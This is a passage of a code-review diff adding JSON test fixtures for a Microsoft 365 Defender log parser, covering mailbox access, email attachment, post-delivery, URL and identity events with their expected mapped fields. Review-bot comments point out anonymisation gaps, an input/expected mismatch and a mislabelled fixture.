\"RawEventData\": {\"AppId\": \"7534549d-2945-469c-9599-c84e749eeeba\", \"ClientAppId\": \"7534549d-2945-469c-9599-c84e749eeeba\", \"ClientIPAddress\": \"ebce:069e:1ac9:5b57:861b:839d:a2a8:5577\", \"ClientInfoString\": \"Client=REST;Client=RESTSystem;;\", \"CreationTime\": \"2024-10-03T11:23:17Z\", \"ExternalAccess\": false, \"Folders\": [{\"FolderItems\": [{\"ClientRequestId\": \"cd8073a5-7b34-4ba4-9289-542859f3619f\", \"Id\": \"ID1\", \"InternetMessageId\": \"<1641470871.2259807.1727868231060@ltx1-app86239.prod.linkedin.com>\", \"SizeInBytes\": 584240}, {\"ClientRequestId\": \"cd8073a5-7b34-4ba4-9289-542859f3619f\", \"Id\": \"ID2\", \"InternetMessageId\": \"<1.prod.linkedin.com>\", \"SizeInBytes\": 541152}, {\"ClientRequestId\": \"cd8073a5-7b34-4ba4-9289-542859f3619f\", \"Id\": \"ID4\", \"InternetMessageId\": \"<2.prod.linkedin.com>\", \"SizeInBytes\": 594034}, {\"ClientRequestId\": \"cd8073a5-7b34-4ba4-9289-542859f3619f\", \"Id\": \"ID5\", \"InternetMessageId\": \"<1@emsecure.net>\", \"SizeInBytes\": 134730}, {\"ClientRequestId\": \"cd8073a5-7b34-4ba4-9289-542859f3619f\", \"Id\": \"ID6\", \"InternetMessageId\": \"<1@geopod-ismtpd-10>\", \"SizeInBytes\": 343263}, {\"ClientRequestId\": \"cd8073a5-7b34-4ba4-9289-542859f3619f\", \"Id\": \"ID7\", \"InternetMessageId\": \"<1@.prod.linkedin.com>\", \"SizeInBytes\": 584542}], \"Id\": \"ID8\", \"Path\": \"\\\\Bo\\u00eete de r\\u00e9ception\"}], \"Id\": \"f747c19c-0664-45c8-aac9-8f16e7714de1\", \"InternalLogonType\": 0, \"LogonType\": 0, \"LogonUserSid\": \"S-1\", \"MailboxGuid\": \"6b8eed58-9e96-4167-9ec4-2bb05b47e416\", \"MailboxOwnerSid\": \"S-1\", \"MailboxOwnerUPN\": \"john.doe@example.com\", \"Operation\": \"MailItemsAccessed\", \"OperationCount\": 6, \"OperationProperties\": [{\"Name\": \"MailAccessType\", \"Value\": \"Bind\"}, {\"Name\": \"IsThrottled\", \"Value\": \"False\"}], \"OrganizationId\": \"4fbd5d8d-5bb5-40c4-b477-41cf4fc40509\", \"OrganizationName\": \"neoma.onmicrosoft.com\", \"OriginatingServer\": 
\"PAWPR07MB9438 (15.20.4200.000)\\r\\n\", \"RecordType\": 50, \"ResultStatus\": \"Succeeded\", \"UserId\": \"john.doe@example.com\", \"UserKey\": \"7534549d-2945-469c-9599-c84e749eeeba\", \"UserType\": 5, \"Version\": 1, \"Workload\": \"Exchange\"}, \"ReportId\": \"98261974_20893_f747c19c-0664-45c8-aac9-8f16e7714de1\", \"Timestamp\": \"2024-10-03T11:23:17Z\", \"Application\": \"Microsoft Exchange Online\"}, \"Tenant\": \"DefaultTenant\"}" + }, + "expected": { + "message": "{\"time\": \"2024-10-03T11:29:06.6566759Z\", \"tenantId\": \"4fbd5d8d-5bb5-40c4-b477-41cf4fc40509\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-CloudAppEvents\", \"_TimeReceivedBySvc\": \"2024-10-03T11:27:41.2820000Z\", \"properties\": {\"ActionType\": \"MailItemsAccessed\", \"ApplicationId\": 20893, \"AccountDisplayName\": \"7534549d-2945-469c-9599-c84e749eeeba\", \"AccountObjectId\": null, \"AccountId\": \"7534549d-2945-469c-9599-c84e749eeeba\", \"DeviceType\": \"Other\", \"OSPlatform\": \"Unknown\", \"IPAddress\": \"ebce:069e:1ac9:5b57:861b:839d:a2a8:5577\", \"IsAnonymousProxy\": false, \"CountryCode\": \"US\", \"City\": \"redmond\", \"ISP\": \"Microsoft Corporation\", \"UserAgent\": \"Client=REST;Client=RESTSystem;;\", \"IsAdminOperation\": false, \"ActivityObjects\": [{\"Type\": \"Structured object\", \"Role\": \"Parameter\", \"ServiceObjectType\": \"Session ID\"}, {\"Type\": \"Task\", \"Role\": \"Target object\", \"Name\": \"MailItemsAccessed\"}, {\"Type\": \"Property\", \"Role\": \"Parameter\", \"Name\": \"MailAccessType\", \"Value\": \"Bind\"}, {\"Type\": \"Property\", \"Role\": \"Parameter\", \"Name\": \"IsThrottled\", \"Value\": \"False\"}, {\"Type\": \"Account\", \"Role\": \"Actor\", \"Name\": \"7534549d-2945-469c-9599-c84e749eeeba\", \"Id\": \"7534549d-2945-469c-9599-c84e749eeeba\", \"ApplicationId\": 11161, \"ApplicationInstance\": 0}, {\"Type\": \"User\", \"Role\": \"Parameter\", \"Name\": \"John DOE\", \"Id\": \"e1704d61-3815-44cc-a4ad-944623127391\", 
\"ApplicationId\": 11161, \"ApplicationInstance\": 0}], \"AdditionalFields\": {\"IsSatelliteProvider\": false}, \"ActivityType\": \"Run\", \"ObjectName\": \"MailItemsAccessed\", \"ObjectType\": \"Task\", \"ObjectId\": null, \"AppInstanceId\": 0, \"AccountType\": \"Application\", \"IsExternalUser\": false, \"IsImpersonated\": false, \"IPTags\": [\"Microsoft Corporation\"], \"IPCategory\": \"Cloud provider\", \"UserAgentTags\": null, \"RawEventData\": {\"AppId\": \"7534549d-2945-469c-9599-c84e749eeeba\", \"ClientAppId\": \"7534549d-2945-469c-9599-c84e749eeeba\", \"ClientIPAddress\": \"ebce:069e:1ac9:5b57:861b:839d:a2a8:5577\", \"ClientInfoString\": \"Client=REST;Client=RESTSystem;;\", \"CreationTime\": \"2024-10-03T11:23:17Z\", \"ExternalAccess\": false, \"Folders\": [{\"FolderItems\": [{\"ClientRequestId\": \"cd8073a5-7b34-4ba4-9289-542859f3619f\", \"Id\": \"ID1\", \"InternetMessageId\": \"<1641470871.2259807.1727868231060@ltx1-app86239.prod.linkedin.com>\", \"SizeInBytes\": 584240}, {\"ClientRequestId\": \"cd8073a5-7b34-4ba4-9289-542859f3619f\", \"Id\": \"ID2\", \"InternetMessageId\": \"<1.prod.linkedin.com>\", \"SizeInBytes\": 541152}, {\"ClientRequestId\": \"cd8073a5-7b34-4ba4-9289-542859f3619f\", \"Id\": \"ID4\", \"InternetMessageId\": \"<2.prod.linkedin.com>\", \"SizeInBytes\": 594034}, {\"ClientRequestId\": \"cd8073a5-7b34-4ba4-9289-542859f3619f\", \"Id\": \"ID5\", \"InternetMessageId\": \"<1@emsecure.net>\", \"SizeInBytes\": 134730}, {\"ClientRequestId\": \"cd8073a5-7b34-4ba4-9289-542859f3619f\", \"Id\": \"ID6\", \"InternetMessageId\": \"<1@geopod-ismtpd-10>\", \"SizeInBytes\": 343263}, {\"ClientRequestId\": \"cd8073a5-7b34-4ba4-9289-542859f3619f\", \"Id\": \"ID7\", \"InternetMessageId\": \"<1@.prod.linkedin.com>\", \"SizeInBytes\": 584542}], \"Id\": \"ID8\", \"Path\": \"\\\\Bo\\u00eete de r\\u00e9ception\"}], \"Id\": \"f747c19c-0664-45c8-aac9-8f16e7714de1\", \"InternalLogonType\": 0, \"LogonType\": 0, \"LogonUserSid\": \"S-1\", \"MailboxGuid\": 
\"6b8eed58-9e96-4167-9ec4-2bb05b47e416\", \"MailboxOwnerSid\": \"S-1\", \"MailboxOwnerUPN\": \"john.doe@example.com\", \"Operation\": \"MailItemsAccessed\", \"OperationCount\": 6, \"OperationProperties\": [{\"Name\": \"MailAccessType\", \"Value\": \"Bind\"}, {\"Name\": \"IsThrottled\", \"Value\": \"False\"}], \"OrganizationId\": \"4fbd5d8d-5bb5-40c4-b477-41cf4fc40509\", \"OrganizationName\": \"neoma.onmicrosoft.com\", \"OriginatingServer\": \"PAWPR07MB9438 (15.20.4200.000)\\r\\n\", \"RecordType\": 50, \"ResultStatus\": \"Succeeded\", \"UserId\": \"john.doe@example.com\", \"UserKey\": \"7534549d-2945-469c-9599-c84e749eeeba\", \"UserType\": 5, \"Version\": 1, \"Workload\": \"Exchange\"}, \"ReportId\": \"98261974_20893_f747c19c-0664-45c8-aac9-8f16e7714de1\", \"Timestamp\": \"2024-10-03T11:23:17Z\", \"Application\": \"Microsoft Exchange Online\"}, \"Tenant\": \"DefaultTenant\"}", + "event": { + "category": [ + "network" + ], + "dataset": "cloud_app_events", + "type": [ + "info" + ] + }, + "@timestamp": "2024-10-03T11:23:17Z", + "action": { + "properties": { + "Application": "Microsoft Exchange Online", + "ApplicationId": "20893", + "IPCategory": "Cloud provider", + "IPTags": [ + "Microsoft Corporation" + ], + "ISP": "Microsoft Corporation", + "IsAdminOperation": "false", + "IsAnonymousProxy": "false", + "IsExternalUser": false, + "IsImpersonated": false, + "ObjectName": "MailItemsAccessed", + "ObjectType": "Task", + "RawEventData": "{\"AppId\": \"7534549d-2945-469c-9599-c84e749eeeba\", \"ClientAppId\": \"7534549d-2945-469c-9599-c84e749eeeba\", \"ClientIPAddress\": \"ebce:069e:1ac9:5b57:861b:839d:a2a8:5577\", \"ClientInfoString\": \"Client=REST;Client=RESTSystem;;\", \"CreationTime\": \"2024-10-03T11:23:17Z\", \"ExternalAccess\": false, \"Folders\": [{\"FolderItems\": [{\"ClientRequestId\": \"cd8073a5-7b34-4ba4-9289-542859f3619f\", \"Id\": \"ID1\", \"InternetMessageId\": \"<1641470871.2259807.1727868231060@ltx1-app86239.prod.linkedin.com>\", \"SizeInBytes\": 584240}, 
{\"ClientRequestId\": \"cd8073a5-7b34-4ba4-9289-542859f3619f\", \"Id\": \"ID2\", \"InternetMessageId\": \"<1.prod.linkedin.com>\", \"SizeInBytes\": 541152}, {\"ClientRequestId\": \"cd8073a5-7b34-4ba4-9289-542859f3619f\", \"Id\": \"ID4\", \"InternetMessageId\": \"<2.prod.linkedin.com>\", \"SizeInBytes\": 594034}, {\"ClientRequestId\": \"cd8073a5-7b34-4ba4-9289-542859f3619f\", \"Id\": \"ID5\", \"InternetMessageId\": \"<1@emsecure.net>\", \"SizeInBytes\": 134730}, {\"ClientRequestId\": \"cd8073a5-7b34-4ba4-9289-542859f3619f\", \"Id\": \"ID6\", \"InternetMessageId\": \"<1@geopod-ismtpd-10>\", \"SizeInBytes\": 343263}, {\"ClientRequestId\": \"cd8073a5-7b34-4ba4-9289-542859f3619f\", \"Id\": \"ID7\", \"InternetMessageId\": \"<1@.prod.linkedin.com>\", \"SizeInBytes\": 584542}], \"Id\": \"ID8\", \"Path\": \"\\\\Bo\\u00eete de r\\u00e9ception\"}], \"Id\": \"f747c19c-0664-45c8-aac9-8f16e7714de1\", \"InternalLogonType\": 0, \"LogonType\": 0, \"LogonUserSid\": \"S-1\", \"MailboxGuid\": \"6b8eed58-9e96-4167-9ec4-2bb05b47e416\", \"MailboxOwnerSid\": \"S-1\", \"MailboxOwnerUPN\": \"john.doe@example.com\", \"Operation\": \"MailItemsAccessed\", \"OperationCount\": 6, \"OperationProperties\": [{\"Name\": \"MailAccessType\", \"Value\": \"Bind\"}, {\"Name\": \"IsThrottled\", \"Value\": \"False\"}], \"OrganizationId\": \"4fbd5d8d-5bb5-40c4-b477-41cf4fc40509\", \"OrganizationName\": \"neoma.onmicrosoft.com\", \"OriginatingServer\": \"PAWPR07MB9438 (15.20.4200.000)\\r\\n\", \"RecordType\": 50, \"ResultStatus\": \"Succeeded\", \"UserId\": \"john.doe@example.com\", \"UserKey\": \"7534549d-2945-469c-9599-c84e749eeeba\", \"UserType\": 5, \"Version\": 1, \"Workload\": \"Exchange\"}" + }, + "type": "MailItemsAccessed" + }, + "host": { + "os": { + "full": "Unknown" + }, + "type": "Other" + }, + "microsoft": { + "defender": { + "activity": { + "objects": [ + { + "Role": "Parameter", + "ServiceObjectType": "Session ID", + "Type": "Structured object" + }, + { + "Name": "MailItemsAccessed", + 
"Role": "Target object", + "Type": "Task" + }, + { + "Name": "MailAccessType", + "Role": "Parameter", + "Type": "Property", + "Value": "Bind" + }, + { + "Name": "IsThrottled", + "Role": "Parameter", + "Type": "Property", + "Value": "False" + }, + { + "ApplicationId": 11161, + "ApplicationInstance": 0, + "Id": "7534549d-2945-469c-9599-c84e749eeeba", + "Name": "7534549d-2945-469c-9599-c84e749eeeba", + "Role": "Actor", + "Type": "Account" + }, + { + "ApplicationId": 11161, + "ApplicationInstance": 0, + "Id": "e1704d61-3815-44cc-a4ad-944623127391", + "Name": "John DOE", + "Role": "Parameter", + "Type": "User" + } + ], + "type": "Run" + }, + "report": { + "id": "98261974_20893_f747c19c-0664-45c8-aac9-8f16e7714de1" + } + } + }, + "related": { + "ip": [ + "ebce:69e:1ac9:5b57:861b:839d:a2a8:5577" + ] + }, + "source": { + "address": "ebce:69e:1ac9:5b57:861b:839d:a2a8:5577", + "geo": { + "city_name": "redmond", + "country_iso_code": "US" + }, + "ip": "ebce:69e:1ac9:5b57:861b:839d:a2a8:5577" + }, + "user": { + "full_name": "7534549d-2945-469c-9599-c84e749eeeba" + }, + "user_agent": { + "device": { + "name": "Other" + }, + "name": "Other", + "original": "Client=REST;Client=RESTSystem;;", + "os": { + "name": "Other" + } + } + } +} \ No newline at end of file diff --git a/Microsoft/microsoft-365-defender/tests/test_email_attachment_info.json b/Microsoft/microsoft-365-defender/tests/test_email_attachment_info.json new file mode 100644 index 000000000..3b71ab37f --- /dev/null +++ b/Microsoft/microsoft-365-defender/tests/test_email_attachment_info.json 
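Review bot: The fixture is only partially anonymized: identifiers and mailboxes use `example.com` and "John DOE", but `"OrganizationName": "neoma.onmicrosoft.com"` looks like a real tenant name and should be replaced with a placeholder such as `example.onmicrosoft.com` in both `input.message` and `expected.message`. The expected `action.properties` also mixes types for the same kind of value (`"IsAdminOperation": "false"` as a string next to `"IsExternalUser": false` as a boolean); that comes from the parser, which is outside this hunk, but the fixture now pins the inconsistency. The file is also committed without a trailing newline, as are the other new fixtures in this patch.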
@@ -0,0 +1,57 @@ +{ + "input": { + "message": "{\"time\": \"2024-10-03T11:25:07.5625580Z\", \"tenantId\": \"feaf3131-8194-423e-b591-5d7b688b9b49\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-EmailAttachmentInfo\", \"_TimeReceivedBySvc\": \"2024-10-03T11:22:47.9147121Z\", \"properties\": {\"ReportId\": \"fa0aa6f6-5009-4ee6-9000-e4c3d7b461f2-1047008117853037475-114bd151f8fb0c58642d2170da4ae7d7c57977260ac2cc8905306cab6b2acabc-1\", \"NetworkMessageId\": \"fa0aa6f6-5009-4ee6-9000-e4c3d7b461f2\", \"Timestamp\": \"2024-10-03T11:22:47Z\", \"SenderFromAddress\": \"sender@example.com\", \"RecipientEmailAddress\": \"john.doe@example.com\", \"FileName\": \"Outlook-it5xo44r.jpg\", \"FileType\": \"jpeg\", \"SHA256\": \"114bd151f8fb0c58642d2170da4ae7d7c57977260ac2cc8905306cab6b2acabc\", \"RecipientObjectId\": \"9f888faa-aac1-499d-8119-df55402be910\", \"SenderObjectId\": \"9f95ff60-7f2d-4f5f-baa4-7840c52fae64\", \"SenderDisplayName\": \"John DOE\", \"ThreatNames\": null, \"ThreatTypes\": null, \"DetectionMethods\": null, \"FileSize\": 10996}, \"Tenant\": \"DefaultTenant\"}" + }, + "expected": { + "message": "{\"time\": \"2024-10-03T11:25:07.5625580Z\", \"tenantId\": \"feaf3131-8194-423e-b591-5d7b688b9b49\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-EmailAttachmentInfo\", \"_TimeReceivedBySvc\": \"2024-10-03T11:22:47.9147121Z\", \"properties\": {\"ReportId\": \"fa0aa6f6-5009-4ee6-9000-e4c3d7b461f2-1047008117853037475-114bd151f8fb0c58642d2170da4ae7d7c57977260ac2cc8905306cab6b2acabc-1\", \"NetworkMessageId\": \"fa0aa6f6-5009-4ee6-9000-e4c3d7b461f2\", \"Timestamp\": \"2024-10-03T11:22:47Z\", \"SenderFromAddress\": \"sender@example.com\", \"RecipientEmailAddress\": \"john.doe@example.com\", \"FileName\": \"Outlook-it5xo44r.jpg\", \"FileType\": \"jpeg\", \"SHA256\": \"114bd151f8fb0c58642d2170da4ae7d7c57977260ac2cc8905306cab6b2acabc\", \"RecipientObjectId\": \"9f888faa-aac1-499d-8119-df55402be910\", \"SenderObjectId\": 
\"9f95ff60-7f2d-4f5f-baa4-7840c52fae64\", \"SenderDisplayName\": \"John DOE\", \"ThreatNames\": null, \"ThreatTypes\": null, \"DetectionMethods\": null, \"FileSize\": 10996}, \"Tenant\": \"DefaultTenant\"}", + "event": { + "category": [ + "email" + ], + "dataset": "email_attachment_info", + "type": [ + "info" + ] + }, + "@timestamp": "2024-10-03T11:22:47Z", + "action": { + "properties": { + "RecipientObjectId": "9f888faa-aac1-499d-8119-df55402be910", + "SenderDisplayName": "John DOE", + "SenderObjectId": "9f95ff60-7f2d-4f5f-baa4-7840c52fae64" + } + }, + "email": { + "from": { + "address": [ + "sender@example.com" + ] + }, + "local_id": "fa0aa6f6-5009-4ee6-9000-e4c3d7b461f2", + "to": { + "address": [ + "john.doe@example.com" + ] + } + }, + "file": { + "hash": { + "sha256": "114bd151f8fb0c58642d2170da4ae7d7c57977260ac2cc8905306cab6b2acabc" + }, + "name": "Outlook-it5xo44r.jpg", + "size": 10996 + }, + "microsoft": { + "defender": { + "report": { + "id": "fa0aa6f6-5009-4ee6-9000-e4c3d7b461f2-1047008117853037475-114bd151f8fb0c58642d2170da4ae7d7c57977260ac2cc8905306cab6b2acabc-1" + } + } + }, + "related": { + "hash": [ + "114bd151f8fb0c58642d2170da4ae7d7c57977260ac2cc8905306cab6b2acabc" + ] + } + } +} \ No newline at end of file diff --git a/Microsoft/microsoft-365-defender/tests/test_email_post_delivery.json b/Microsoft/microsoft-365-defender/tests/test_email_post_delivery.json new file mode 100644 index 000000000..f2ac938fb --- /dev/null +++ b/Microsoft/microsoft-365-defender/tests/test_email_post_delivery.json 
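Review bot: This fixture only exercises the benign branch — `ThreatNames`, `ThreatTypes` and `DetectionMethods` are all `null` — so whatever the parser does with those three columns for a malicious attachment is untested, even though that is the case a detection rule cares about. A second sample with e.g. `"ThreatTypes": "Malware"` and a non-null `DetectionMethods` would pin the mapping into `microsoft.defender.threat.*` that `test_email_post_delivery.json` in this same commit shows exists. `FileType: jpeg` is also not surfaced anywhere in the expected block (`file.extension` or `file.mime_type` would be the ECS home), which matters when hunting for executable attachments disguised with an image name; the parser is outside this hunk, so this is a request for the expected block to pin it once the mapping exists.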
@@ -0,0 +1,47 @@ +{ + "input": { + "message": "{\"time\": \"2024-10-03T11:12:21.6209320Z\", \"tenantId\": \"ca4e9ba9-4582-4f4b-a93e-c6ce41b32aac\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-EmailPostDeliveryEvents\", \"_TimeReceivedBySvc\": \"2024-10-03T11:11:32.8258142Z\", \"properties\": {\"ReportId\": \"ec1ad6fe-05ae-4125-bf06-498bc60113f7-10422652723071570813\", \"NetworkMessageId\": \"ec1ad6fe-05ae-4125-bf06-498bc60113f7\", \"RecipientEmailAddress\": \"john.doe@example.com\", \"Timestamp\": \"2024-10-03T11:11:32Z\", \"ActionType\": \"Spam ZAP\", \"ActionResult\": \"Success\", \"Action\": \"Moved to quarantine\", \"DeliveryLocation\": \"Quarantine\", \"ActionTrigger\": \"SpecialAction\", \"InternetMessageId\": \"<1@eu-west-1.amazonses.com>\", \"ThreatTypes\": \"Spam\", \"DetectionMethods\": \"{\\\"Spam\\\":[\\\"Fingerprint matching\\\"]}\"}, \"Tenant\": \"DefaultTenant\"}" + }, + "expected": { + "message": "{\"time\": \"2024-10-03T11:12:21.6209320Z\", \"tenantId\": \"ca4e9ba9-4582-4f4b-a93e-c6ce41b32aac\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-EmailPostDeliveryEvents\", \"_TimeReceivedBySvc\": \"2024-10-03T11:11:32.8258142Z\", \"properties\": {\"ReportId\": \"ec1ad6fe-05ae-4125-bf06-498bc60113f7-10422652723071570813\", \"NetworkMessageId\": \"ec1ad6fe-05ae-4125-bf06-498bc60113f7\", \"RecipientEmailAddress\": \"john.doe@example.com\", \"Timestamp\": \"2024-10-03T11:11:32Z\", \"ActionType\": \"Spam ZAP\", \"ActionResult\": \"Success\", \"Action\": \"Moved to quarantine\", \"DeliveryLocation\": \"Quarantine\", \"ActionTrigger\": \"SpecialAction\", \"InternetMessageId\": \"<01020192520c9bb4-8a4c9d72-a832-47b9-a13f-ce92d3da71ba-000000@eu-west-1.amazonses.com>\", \"ThreatTypes\": \"Spam\", \"DetectionMethods\": \"{\\\"Spam\\\":[\\\"Fingerprint matching\\\"]}\"}, \"Tenant\": \"DefaultTenant\"}", + "event": { + "action": "Moved to quarantine", + "category": [ + "email" + ], + "dataset": "email_post_delivery_events", + 
"type": [ + "info" + ] + }, + "@timestamp": "2024-10-03T11:11:32Z", + "action": { + "properties": { + "ActionResult": "Success", + "ActionTrigger": "SpecialAction", + "DeliveryLocation": "Quarantine" + }, + "type": "Spam ZAP" + }, + "email": { + "local_id": "ec1ad6fe-05ae-4125-bf06-498bc60113f7", + "message_id": "<1@eu-west-1.amazonses.com>", + "to": { + "address": [ + "john.doe@example.com" + ] + } + }, + "microsoft": { + "defender": { + "report": { + "id": "ec1ad6fe-05ae-4125-bf06-498bc60113f7-10422652723071570813" + }, + "threat": { + "detection": "{\"Spam\": [\"Fingerprint matching\"]}", + "types": "Spam" + } + } + } + } +} \ No newline at end of file diff --git a/Microsoft/microsoft-365-defender/tests/test_email_url_info_2.json b/Microsoft/microsoft-365-defender/tests/test_email_url_info_2.json new file mode 100644 index 000000000..84218c54b --- /dev/null +++ b/Microsoft/microsoft-365-defender/tests/test_email_url_info_2.json 
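Review bot: `expected.message` does not match `input.message` in this fixture: the input carries `\"InternetMessageId\": \"<1@eu-west-1.amazonses.com>\"` while the expected copy still holds `<01020192520c9bb4-8a4c9d72-a832-47b9-a13f-ce92d3da71ba-000000@eu-west-1.amazonses.com>`, so the test cannot pass if the raw message is passed through unchanged (every other fixture in this commit keeps the two strings identical), and it commits an un-anonymised SES message id that the input was scrubbed to hide. Replace the id in the expected string with `<1@eu-west-1.amazonses.com>` so input, expected message and `email.message_id` agree. Separately, `DetectionMethods` is double-encoded JSON (`{"Spam":["Fingerprint matching"]}` inside a string) and is stored verbatim in `microsoft.defender.threat.detection`; a parsed object would be far more usable in rules, but that is a parser change outside this hunk.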
@@ -0,0 +1,43 @@ +{ + "input": { + "message": "{\"time\": \"2024-10-04T16:36:20.6444402Z\", \"tenantId\": \"98bcadf5-38d6-4d9f-83bd-1185aa13e9c6\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-EmailUrlInfo\", \"_TimeReceivedBySvc\": \"2024-10-04T16:35:56.4645301Z\", \"properties\": {\"ReportId\": \"4b978e05-5fd9-4c73-9a21-b1403cad0c09-4376657523182014843\", \"NetworkMessageId\": \"4b978e05-5fd9-4c73-9a21-b1403cad0c09\", \"Timestamp\": \"2024-10-04T16:35:56Z\", \"Url\": \"https://example.com/index.php?q=some+stuff\", \"UrlDomain\": \"example.com\", \"UrlLocation\": \"Body\"}, \"Tenant\": \"DefaultTenant\"}" + }, + "expected": { + "message": "{\"time\": \"2024-10-04T16:36:20.6444402Z\", \"tenantId\": \"98bcadf5-38d6-4d9f-83bd-1185aa13e9c6\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-EmailUrlInfo\", \"_TimeReceivedBySvc\": \"2024-10-04T16:35:56.4645301Z\", \"properties\": {\"ReportId\": \"4b978e05-5fd9-4c73-9a21-b1403cad0c09-4376657523182014843\", \"NetworkMessageId\": \"4b978e05-5fd9-4c73-9a21-b1403cad0c09\", \"Timestamp\": \"2024-10-04T16:35:56Z\", \"Url\": \"https://example.com/index.php?q=some+stuff\", \"UrlDomain\": \"example.com\", \"UrlLocation\": \"Body\"}, \"Tenant\": \"DefaultTenant\"}", + "event": { + "category": [ + "email" + ], + "dataset": "email_url_info", + "type": [ + "info" + ] + }, + "@timestamp": "2024-10-04T16:35:56Z", + "email": { + "local_id": "4b978e05-5fd9-4c73-9a21-b1403cad0c09" + }, + "microsoft": { + "defender": { + "report": { + "id": "4b978e05-5fd9-4c73-9a21-b1403cad0c09-4376657523182014843" + } + } + }, + "related": { + "hosts": [ + "example.com" + ] + }, + "url": { + "domain": "example.com", + "original": "https://example.com/index.php?q=some+stuff", + "path": "/index.php", + "port": 443, + "query": "q=some+stuff", + "registered_domain": "example.com", + "scheme": "https", + "top_level_domain": "com" + } + } +} \ No newline at end of file 
diff --git a/Microsoft/microsoft-365-defender/tests/test_identity_info.json b/Microsoft/microsoft-365-defender/tests/test_identity_info.json
index d5aae258c..0a0174b85 100644
--- a/Microsoft/microsoft-365-defender/tests/test_identity_info.json
+++ b/Microsoft/microsoft-365-defender/tests/test_identity_info.json
@@ -5,8 +5,12 @@ "expected": { "message": "{\"time\":\"2022-09-01T07:28:59.5127177Z\",\"tenantId\":\"5ac3ff49-0e19-4600-9ad1-333e64e3b5cc\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-IdentityInfo\",\"properties\":{\"AccountSid\":null,\"AccountDomain\":null,\"AccountName\":null,\"LogonId\":null,\"FileName\":null,\"FolderPath\":null,\"MD5\":null,\"SHA1\":null,\"FileSize\":null,\"SHA256\":null,\"ProcessCreationTime\":null,\"ProcessTokenElevation\":null,\"RemoteUrl\":null,\"RegistryKey\":null,\"RegistryValueName\":null,\"RegistryValueData\":null,\"RemoteDeviceName\":null,\"FileOriginIP\":null,\"FileOriginUrl\":null,\"LocalIP\":\"1.2.3.4\",\"LocalPort\":null,\"RemoteIP\":\"5.6.7.8\",\"RemotePort\":null,\"ProcessId\":null,\"ProcessCommandLine\":null,\"AdditionalFields\":\"{\\\"BaseAddress\\\":2098738167808,\\\"RegionSize\\\":262144,\\\"ProtectionMask\\\":64}\",\"ActionType\":\"NtAllocateVirtualMemoryApiCall\",\"InitiatingProcessVersionInfoCompanyName\":\"Google\",\"InitiatingProcessVersionInfoProductName\":\"Software Reporter Tool\",\"InitiatingProcessVersionInfoProductVersion\":\"102.286.200\",\"InitiatingProcessVersionInfoInternalFileName\":\"software_reporter_tool_exe\",\"InitiatingProcessVersionInfoOriginalFileName\":\"software_reporter_tool.exe\",\"InitiatingProcessVersionInfoFileDescription\":\"Software Reporter Tool\",\"InitiatingProcessFolderPath\":\"c:\\\\users\\\\USER\\\\appdata\\\\local\\\\google\\\\chrome\\\\user 
data\\\\swreporter\\\\102.286.200\\\\software_reporter_tool.exe\",\"InitiatingProcessFileName\":\"software_reporter_tool.exe\",\"InitiatingProcessFileSize\":14687048,\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessSHA256\":\"6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323\",\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessLogonId\":121834210,\"InitiatingProcessAccountSid\":\"S-1-00-1-1111111-2222222222-3333333333-4444444444\",\"InitiatingProcessAccountDomain\":\"intranet\",\"InitiatingProcessAccountName\":\"group1\",\"InitiatingProcessAccountUpn\":\"user@example.org\",\"InitiatingProcessAccountObjectId\":\"9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2\",\"InitiatingProcessCreationTime\":\"2022-09-01T06:56:23.7887846Z\",\"InitiatingProcessId\":1664,\"InitiatingProcessCommandLine\":\"\\\"software_reporter_tool.exe\\\" --use-crash-handler-with-id=\\\"\\\\\\\\.\\\\pipe\\\\crashpad_11111_XXXXXXXXXXXXXXXX\\\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2\",\"InitiatingProcessParentCreationTime\":\"2022-09-01T06:56:23.595229Z\",\"InitiatingProcessParentId\":15532,\"InitiatingProcessParentFileName\":\"software_reporter_tool.exe\",\"DeviceId\":\"1111111111111111111111111111111111111111\",\"AppGuardContainerId\":\"\",\"MachineGroup\":\"UnassignedGroup\",\"Timestamp\":\"2022-09-01T07:09:47.4980566Z\",\"DeviceName\":\"test.lab\",\"ReportId\":104061}}", "event": { + "category": [ + "iam" + ], + "dataset": "identity_info", "type": [ - "info" + "user" ] }, "@timestamp": "2022-09-01T07:09:47.498056Z", diff --git a/Microsoft/microsoft-365-defender/tests/test_identity_info_2.json b/Microsoft/microsoft-365-defender/tests/test_identity_info_2.json new file mode 100644 index 000000000..de75ec66d --- /dev/null +++ b/Microsoft/microsoft-365-defender/tests/test_identity_info_2.json 
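Review bot: The payload in this fixture is not an IdentityInfo record — its `properties` are DeviceEvents columns (`ActionType: NtAllocateVirtualMemoryApiCall`, `InitiatingProcessCommandLine`, `RemoteIP`, `DeviceId`) with the `category` header relabelled `AdvancedHunting-IdentityInfo` — so the only thing the new `iam`/`user` expectations verify is category-based routing, not the identity field mapping. The sibling `test_identity_info_2.json` added in this commit carries a genuine IdentityInfo sample; consider dropping this fixture or replacing its message with a real identity record so the `user.*`/`related.user` expectations are exercised. As it stands a regression in the IdentityInfo mapping would not be caught here.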
